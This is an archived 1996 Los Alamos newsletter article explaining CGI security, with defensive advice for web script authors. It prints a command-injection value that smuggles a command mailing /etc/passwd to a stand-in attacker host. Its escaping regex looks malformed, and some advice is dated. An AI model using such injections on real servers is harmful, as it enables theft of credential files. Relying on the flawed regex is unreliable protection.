COLLECTED BY
Organization:
Alexa Crawls
Starting in 1996,
Alexa Internet has been donating their crawl data to the Internet Archive. Flowing in every day, these data are added to the
Wayback Machine after an embargo period.
Crawl data donated by Alexa Internet. This data is currently not publicly accessible
The Wayback Machine - https://web.archive.org/web/20000416053740/http://www.lanl.gov:80/projects/ia/library/bits/bits0396.html
IA Home |
Introduction |
IA Glossary |
Standards |
IA Library |
Nav Aids
Controlled Access:
RFCs |
Activity Areas
BITS Homepage
|
CGI Security
March 1996 BITS: computing and communications news
|
The Common Gateway Interface (CGI) is what, for now at least,
makes the World Wide Web interactive. CGI enables users to do
more than simply read static files; it enables them to perform
tasks such as searching for information, filling out and
submitting forms, and more.
This capability makes the Web a far more useful place and
has been widely adopted by the Internet community. Throughout
the universities, laboratories, companies, and other
organizations that comprise the Web, CGI scripts are
developed, refined, shared--and sometimes compromised.
For the Laboratory, too, CGI is a widely used tool.
As always, and especially at an institution such as
the Laboratory, whenever you allow somebody to execute tasks
on your machine, you're opening a potential security hole
and you need to make sure it's adequately plugged.
The Mechanism
Basically, there are two parts to a CGI "script": an executable
(the script itself) and an HTML page that drives the executable.
The executable can be just about anything that runs, including
system calls, Perl scripts, shell scripts, and compiled programs
(C, Pascal, etc.).
The HTML page is actually optional. CGI scripts can be used
without user input to increment page counters, display the day
and date, etc. If the user is to enter any information, however,
the HTML page is needed.
When both parts are properly constructed, the CGI action is
performed as follows (as illustrated by a form submission):
- The user pulls the HTML form page from the server onto his/her
client machine (see Figure 1).
- The user fills out the form on the client machine.
- The user presses "Submit", which then sends an execute request
to the server. (The client-side browser interprets the
form into an execute request, which identifies the server-side
program and includes the information that was filled into
the form.)
- The server executes the requested program.

Figure 1: CGI Execution Cycle
The same basic process occurs for other CGI scripts that accept
user input. A clickable imagemap, for example, sends the image to
the client machine and issues an execute request that specifies
which part of the image was clicked on.
The fundamental strength of CGI is its simplicity. Entering
information on the form and all other manipulation is performed on the client
machine, so the server doesn't have to worry about it. All that
the server has to do is to execute the request when it is issued.
Therein also lies the fundamental security weakness within CGI.
Because the HTML page itself is transferred to the client
machine, the user has an unrestricted ability to edit the page at
will and to enter whatever he/she pleases. The execute request
might easily be a good deal different from what you expect.
A Simple Shell Breach
The most commonly cited examples of CGI security breaches involve
cajoling the shell into performing something unexpected. For instance,
let's say we want a form that lets a user e-mail a message to a
specified person. In our HTML form page, we might write something
like the following:
<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov">Alan Arkin<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="lball@lanl.gov">Lucille Ball<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George Burns
Now let's say we execute a script that writes the message to a
temporary file and then e-mails that file to the selected address.
In Perl, this could be done with
system("/usr/lib/sendmail -t $send_to < $temp_file");
As long as the user selects from the addresses that are given,
everything will work fine. There is however no way to be sure.
Because the HTML form itself has been transferred to the user's
client machine, he/she is free to edit it to read something like
<INPUT TYPE="radio" NAME="send_to"
VALUE="aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd">
Alan Arkin<br>
As soon as this gets sent, the original sendmail call will stop
at the semicolon, and the system will execute the next
command--which would mail the password file to the user, who
could then easily decrypt it and use it to gain login access to
your machine.
Other Breaches
The above example is not the only thing that can go wrong. Aside
from capturing a password file, malicious users can also exploit
poorly defended CGI to
- Access other sensitive files;
- Install and execute their own programs on your system
(including "Trojan Horses" that monitor system activity and
report back to the user);
- Install other viruses; or
- Gain an overall map of your filesystem in order to search for
potential weaknesses.
Also, not all of the weaknesses are at the system level (and UNIX
isn't the only vulnerable operating system). Other
vulnerabilities that have been identified include the following:
- Certain mail programs allow a ~ to execute arbitrary programs.
- Server-side includes have been tricked into executing commands
embedded within HTML comments in the input
(e.g., ).
- C programs that "forgot" array boundaries have been tricked
into executing programs via very long input.
- Some early sendmail programs allowed any user to execute
arbitrary programs.
This is by no means a complete list. More breaches have been
identified; others have been invented but not yet identified;
still others have not yet been invented.
The basic point, however, remains the same: CGI should always be
used with caution.
How to Make Your CGI Secure
As with other areas of computer security, the basic idea behind
securing CGI is to understand the demonstrated and potential
threats, to counter these threats, and to monitor system activity
for unusual events.
Start with an adequately secured server. This includes
appropriate screening at the router, turning off un-needed
daemons, creating a non-privileged WWW user and group,
and restricting the file system. Additional precautions may be
required, depending upon the
partition in which you are working, who the intended audience is, and
the sensitivity level of the data on the machine. These precautions
including monitoring who
accesses the scripts and the other activities those users perform,
and consulting with your computer security officer as needed.
Beyond the basics, there are other methods of improving CGI
security.
Never Accept Unchecked Input
Always check for special characters such as ";" before you open a
shell. You can do this either by restricting the input you accept
or by escaping any dangerous characters. In Perl, for example,
the following line escapes dangerous UNIX shell characters within
a variable:
$var =~ s/([;<>\*\|`\$!#\(\)\[\]\{\}:'"]@)/\\$1/g;
Among the other things to check:
- For server-side includes, check for "<" and ">" in order to
identify and validate any embedded HTML tags.
- For scripts that utilize e-mail, validate that the addresses are
within an acceptable domain (e.g., make sure they're
"@lanl.gov").
- Look for any occurrence of "/../" (which might indicate that
the user is attempting to access higher levels of the directory
structure).
- For selection lists, check to make sure that the value sent is
a valid choice.
Prefer Compiled Programs to Interpreted Scripts
This is a very general guideline, by no means an ironclad "rule."
The basic idea is that a compiled program (e.g., a binary executable
from C) is more
difficult to make sense of if a user is able to get a copy of it.
This in turn makes it more difficult for the user to search for
potential weaknesses within the program.
Counterbalancing this general preference are the facts that an interpreted program
(e.g., Perl) is generally easier for the programmer to understand
(including whoever has to support the program after it is
written) and easier to test (no need to compile before each
test). Hence, even though the compiled programs are generally
preferred, there are many specific cases where the interpreted
program is perfectly acceptable.
Avoid the Shell
Again, this is a very general guideline--more of a caution than a
rule. There is nothing inherently wrong with opening a shell,
provided that the security implications are understood and
addressed. Frequently, though, it is easier to sidestep the shell
concerns and call a program directly.
In UNIX/Perl, for example, a new shell is opened by system, exec,
eval, backticks, etc. Hence, the basic weakness of the following
line (taken from the above example) stems from the fact that it
is operating at the system level in its own shell:
system("/usr/lib/sendmail -t $send_to < $temp_file");
A construction like the following sidesteps this weakness by
calling sendmail directly:
open(MAIL, "|/usr/lib/sendmail -t");
print MAIL "To: $send_to\n";
print MAIL "$input_line_1";
...etc.
close(MAIL);
Keep in mind, however, that when you call a program directly you
are in a sense trading the known security vulnerabilities of the
shell for the potentially unknown vulnerabilities of the program.
Control Filesystem Permissions
Users need to execute CGI scripts, but there is no reason for
them to have read or write permissions. Similarly, users need to
read the HTML driver files (and to read and execute their
directory), but there is no need for them to have write or
execute permission to the files (or write permission to their
directory).
These controls are most easily maintained as follows:
- Put scripts in separate directory and set permissions for the
directory and its files to rwx--x--x (or the equivalent).
- If you are using compiled programs, put the source in a
different directory from the compiled programs (to prevent
users from "guessing" their name and accessing the source).
- Do not leave old or not-yet-validated versions of scripts in
the active scripts directory (including the filename~ backups
that Emacs automatically makes).
- Restrict permissions for HTML files to rw-r--r-- and for their
directories to rwxr-xr-x (or the equivalents).
- If the CGI output will be written to a file, put that file in a
separate directory, assign that directory's ownership to the
non-privileged WWW user, and set (umask) the permissions to
rw------- for the file and rwx------ for the directory.
Validate Scripts from the Web
There are many CGI scripts freely available on the Web. While
these can often serve as a good starting point, many of them
come from university environments that do not have the same
security concerns as the Laboratory. A number have been
demonstrated to contain security holes, and some have even
been found to contain Trojan Horses.
Any time you "borrow" a free script as a starting point,
make sure to validate it for security. Check it as outlined
above, and modify it as needed. Above all, don't run anything
that contains any lines you don't understand. Don't even test
it until you've figured it out--there's no telling what it
might do.
Additional Information
As CGI programming has become more popular, the amount of
information about it and security has grown. Good sources of information
(including the sources of some of the above suggestions) include
the following:
Links to these and other security resources are available from
the Information Architecture's Internet/WWW Subject Area web
space--
http://www.lanl.gov/projects/ia-lanl/area/web/
For further information about the Information Architecture
project itself, see
http://www.lanl.gov/projects/ia/
Or look under "What's New" from the Laboratory home page.
Tad Lane, tad@lanl.gov, (505) 667-0886
Information Architecture Standards Editor
Communications Arts and Services (CIC-1)
ia-std-editor@lanl.gov -
Copyright © 1996 UC -
Disclaimer -
March 12, 1996
Unlimited release - LALP-96-11 (2/96)